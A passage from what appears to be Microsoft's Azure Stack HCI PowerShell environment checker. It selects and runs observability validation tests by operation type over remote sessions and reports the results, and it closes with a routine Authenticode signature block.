etc...")] [string[]] $OperationType, [Parameter(Mandatory = $false, HelpMessage = "Skip LogCollection test.")] [switch] $SkipLogCollectionValidation, [Parameter(Mandatory = $false, HelpMessage = "Tests to include.")] [ArgumentCompleter({ Get-TestListByFunction -ModuleName AzStackHci.Observability.Helpers })] [ValidateScript({ $_ -in (Get-TestListByFunction -ModuleName AzStackHci.Observability.Helpers) })] [string[]] $Include, [Parameter(Mandatory = $false, HelpMessage = "Tests to exclude.")] [ArgumentCompleter({ Get-TestListByFunction -ModuleName AzStackHci.Observability.Helpers })] [ValidateScript({ $_ -in (Get-TestListByFunction -ModuleName AzStackHci.Observability.Helpers) })] [string[]] $Exclude, [Parameter(Mandatory = $false, HelpMessage = "Return PSObject result.")] [switch] $PassThru, [Parameter(Mandatory = $false, HelpMessage = "Directory path for log and report output")] [string]$OutputPath, [Parameter(Mandatory = $false, HelpMessage = "Remove all previous progress and create a clean report")] [switch]$CleanReport = $false ) try { $script:ErrorActionPreference = 'Stop' Set-AzStackHciOutputPath -Path $OutputPath # Ensure we are elevated if (Test-Elevation) { Log-Info -Message ($lvsTxt.ElevationModeInfo) -Type Info } else { Log-Info -Message ($lvsTxt.ElevationModeMsg) -Type Error -ConsoleOut throw $($lvsTxt.ElevationModeErrMsg) } Write-AzStackHciHeader -invocation $MyInvocation -params $PSBoundParameters -PassThru:$PassThru Test-ModuleUpdate -PassThru:$PassThru # Call/Initialise reporting $envcheckerReport = Get-AzStackHciEnvProgress -clean:$CleanReport $envcheckerReport = Add-AzStackHciEnvJob -report $envcheckerReport Write-Progress -Id 1 -Activity "Checking AzStackHci Dependancies" -Status "Environment Configuration" -PercentComplete 0 -ErrorAction SilentlyContinue $postDeployPsSession = $null $postDeploymentTestList = @("Test-RemoteSupport", "Test-LogCollection") $upgradeTestListToExclude = @("Test-ObservabilityVolume", "Test-LogCollection", "Test-RemoteSupport") $addNodeListToExclude = @("Test-RemoteSupport", "Test-LogCollection") # Get the list of unsupport test based on operationType if ($OperationType -eq 'Deployment') { $Exclude += $postDeploymentTestList } elseif($OperationType -eq 'Upgrade') { $Exclude += $upgradeTestListToExclude } elseif($OperationType -eq 'AddNode') { $Exclude += $addNodeListToExclude } elseif ($SkipLogCollectionValidation) { $Exclude += @("Test-LogCollection") } $testList = Get-TestListByFunction -ModuleName AzStackHci.Observability.Helpers $script:envchktestList = Select-TestList -Exclude $Exclude -TestList $TestList $totalTestCount = ($script:envchktestList).Count # Run validation $instanceCount = 0 $observabilityResult = @() $progressActivity = "Validating AzStackHci Observability Component" if ($PsSession) { foreach ($Session in $PsSession) { if ($Session.State -ne 'Opened') { try { Connect-PSSession -Session $Session } catch { $psSessionFail = $lvsTxt.PsSessionFail -f $Session.ComputerName, $_.Exception.Message Log-Info ($psSessionFail) -Type Error -ConsoleOut throw $psSessionFail } } } # Get Single PSSession for RemoteSupport and LogCollection Test if($PsSession.count -gt 1) { $postDeployPsSession = $PsSession[0] } else { $postDeployPsSession = $PsSession } $progressStatus = "Testing $($PsSession.ComputerName -join ',')" $progressParams = @{ Id = 1 Activity = $progressActivity Status = $progressStatus ErrorAction = 'SilentlyContinue' } :noTestsBreak foreach ($test in $script:envchktestList) { $outputMsg = $lvsTxt.TestProgessInfo -f $test, ($PsSession.ComputerName -join ',') Log-Info -Message $outputMsg -Type Info Write-Progress @progressParams -CurrentOperation $outputMsg -PercentComplete (($instanceCount++ / $totalTestCount) * 100) if ($postDeploymentTestList -contains $test) { $splat = @{ PsSession = $postDeployPsSession OperationType = $OperationType } $observabilityResult += Invoke-Expression "$test @splat" } else { $splat = @{ PsSession = $PsSession OperationType = $OperationType } $observabilityResult += Invoke-Expression "$test @splat" } } } # Feedback results - user scenario if (-not $PassThru) { Write-Host 'Observability Results' Write-AzStackHciResult -Title 'Observability' -Result $observabilityResult Write-Summary -Result $observabilityResult -Property1 Detail } else { return $observabilityResult } } catch { Log-Info -Message "" -ConsoleOut Log-Info -Message "$($_.Exception.Message)" -ConsoleOut -Type Error Log-Info -Message "$($_.ScriptStackTrace)" -ConsoleOut -Type Error $cmdletFailed = $true throw $_ } finally { $Script:ErrorActionPreference = 'SilentlyContinue' # Write result to telemetry channel foreach ($result in $observabilityResult) { Write-ETWResult -Result $result } # Write validation result to report object and close out report $envcheckerReport | Add-Member -MemberType NoteProperty -Name 'Observability' -Value $observabilityResult -Force $envcheckerReport = Close-AzStackHciEnvJob -report $envcheckerReport Write-AzStackHciEnvReport -report $envcheckerReport Write-AzStackHciFooter -invocation $MyInvocation -Failed:$cmdletFailed -PassThru:$PassThru } } # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCC8DB0Af11auLyK # FuvzUh+aktYBjR2LkExGNEmJKaxB0qCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIIt27Zh7KM9RgQOZZQ9eATVj # l8dFDbAa3HLIpbi6DnmuMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAL0geWzkoyq3BhEfwUP9oYfWApZRfUtqSselXxHreoo4laGNF+UOOya5n # M35saMaWy+pmgRbK3LNopRMkZhVo26uLMoMcghZG/c8i3uvbhjLgSpHNWCU6D+K8 # HhC2ShXzYjpte9IAo2XA4L7hLWOyPso5+FfOK0i1xqXMEKINlpCnAfqnyZMmLOGM # AhB0qJJLXoIpymqOf0jBr3ZmuY7MgAEZB+4Vgycv8zN88GXcCpXp4eUEKlYjk9s5 # gZNnChd/TOM/F7bz+mnmDVTjWspCwecus2ktaL3OvBeofJJP5tA0knVGkGM1Qfq2 # f3n5VsC++cGN5Fxl4SMjESPrxxOQiaGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq # hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCDbrNQB1iwU5xhGZadYRrKV9fm9HE+IR4cOlfUq8mgPqwIGZbqjMw9Q # GBMyMDI0MDIxMjE0MDY0NS41NjJaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV # UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE # ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl # bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO # OjNCRDQtNEI4MC02OUMzMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT # ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJ # KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx # MDEyMTkwNzM1WhcNMjUwMTEwMTkwNzM1WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV # BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv # c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl # cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjozQkQ0LTRC # ODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC # AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAKl74Drau2O6LLrJO3HyTvO9 # aXai//eNyP5MLWZrmUGNOJMPwMI08V9zBfRPNcucreIYSyJHjkMIUGmuh0rPV5/2 # +UCLGrN1P77n9fq/mdzXMN1FzqaPHdKElKneJQ8R6cP4dru2Gymmt1rrGcNe800C # cD6d/Ndoommkd196VqOtjZFA1XWu+GsFBeWHiez/PllqcM/eWntkQMs0lK0zmCfH # +Bu7i1h+FDRR8F7WzUr/7M3jhVdPpAfq2zYCA8ZVLNgEizY+vFmgx+zDuuU/GChD # K7klDcCw+/gVoEuSOl5clQsydWQjJJX7Z2yV+1KC6G1JVqpP3dpKPAP/4udNqpR5 # HIeb8Ta1JfjRUzSv3qSje5y9RYT/AjWNYQ7gsezuDWM/8cZ11kco1JvUyOQ8x/JD # kMFqSRwj1v+mc6LKKlj//dWCG/Hw9ppdlWJX6psDesQuQR7FV7eCqV/lfajoLpPN # x/9zF1dv8yXBdzmWJPeCie2XaQnrAKDqlG3zXux9tNQmz2L96TdxnIO2OGmYxBAA # ZAWoKbmtYI+Ciz4CYyO0Fm5Z3T40a5d7KJuftF6CToccc/Up/jpFfQitLfjd71cS # +cLCeoQ+q0n0IALvV+acbENouSOrjv/QtY4FIjHlI5zdJzJnGskVJ5ozhji0YRsc # v1WwJFAuyyCMQvLdmPddAgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQU3/+fh7tNczEi # fEXlCQgFOXgMh6owHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD # VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j # cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG # CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw # MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD # CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBADP6whOFjD1ad8Gk # EJ9oLBuvfjndMyGQ9R4HgBKSlPt3pa0XVLcimrJlDnKGgFBiWwI6XOgw82hdolDi # MDBLLWRMTJHWVeUY1gU4XB8OOIxBc9/Q83zb1c0RWEupgC48I+b+2x2VNgGJUsQI # yPR2PiXQhT5PyerMgag9OSodQjFwpNdGirna2rpV23EUwFeO5+3oSX4JeCNZvgyU # OzKpyMvqVaubo+Glf/psfW5tIcMjZVt0elswfq0qJNQgoYipbaTvv7xmixUJGTbi # xYifTwAivPcKNdeisZmtts7OHbAM795ZvKLSEqXiRUjDYZyeHyAysMEALbIhdXgH # Eh60KoZyzlBXz3VxEirE7nhucNwM2tViOlwI7EkeU5hudctnXCG55JuMw/wb7c71 # RKimZA/KXlWpmBvkJkB0BZES8OCGDd+zY/T9BnTp8si36Tql84VfpYe9iHmy7Pqq # xqMF2Cn4q2a0mEMnpBruDGE/gR9c8SVJ2ntkARy5SfluuJ/MB61yRvT1mUx3lypp # O22ePjBjnwoEvVxbDjT1jhdMNdevOuDeJGzRLK9HNmTDC+TdZQlj+VMgIm8ZeEIR # NF0oaviF+QZcUZLWzWbYq6yDok8EZKFiRR5otBoGLvaYFpxBZUE8mnLKuDlYobjr # xh7lnwrxV/fMy0F9fSo2JxFmtLgtMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ # mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT # Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m # dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh # dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1 # WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB # BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK # NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg # fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp # rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d # vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9 # 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR # Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu # qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO # ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb # oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6 # bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t # AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW # BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb # UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz # aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku # aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA # QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2 # VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu # bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw # LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93 # d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt # MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q # XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6 # U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt # I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis # 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp # kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0 # sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e # W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ # sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7 # Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0 # dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ # tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh # bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjoz # QkQ0LTRCODAtNjlDMzElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy # dmljZaIjCgEBMAcGBSsOAwIaAxUA942iGuYFrsE4wzWDd85EpM6RiwqggYMwgYCk # fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH # UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD # Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF # AOl0SLowIhgPMjAyNDAyMTIxNTM1MjJaGA8yMDI0MDIxMzE1MzUyMlowdDA6Bgor # BgEEAYRZCgQBMSwwKjAKAgUA6XRIugIBADAHAgEAAgIMLTAHAgEAAgIT3zAKAgUA # 6XWaOgIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAJ4/sip+/qc1E5gdImJu # jnRmqzGk04ZAlwN+eEO5ngxK/thUYULTdSxS+evVNLBNrvTausIyrC455QI209Vi # y9VcMCYz5JMqq4O101HIfzBGX/WVsCS6sqAISzHRf/1uGkbaBAp9bfyOR7hjM6mD # NnjSS1kYcQuu8CzPUcWIgr39MYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHlj2rA8z20C6MAAQAAAeUwDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQgPEPIFf/8hfn6aiVmQq9kmt8e5pgP84MI4IRjgG6zrOkwgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCAVqdP//qjxGFhe2YboEXeb8I/pAof01CwhbxUH9U69 # 7TCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB5Y9q # wPM9tAujAAEAAAHlMCIEIE3+00phcYLWcmQs1jDY/ypqiHL25D9igsNlQ7ZB44/A # MA0GCSqGSIb3DQEBCwUABIICAJpTOIB19vMOF9aVPDacjc7pS8kBRpkR4172ZC0O # 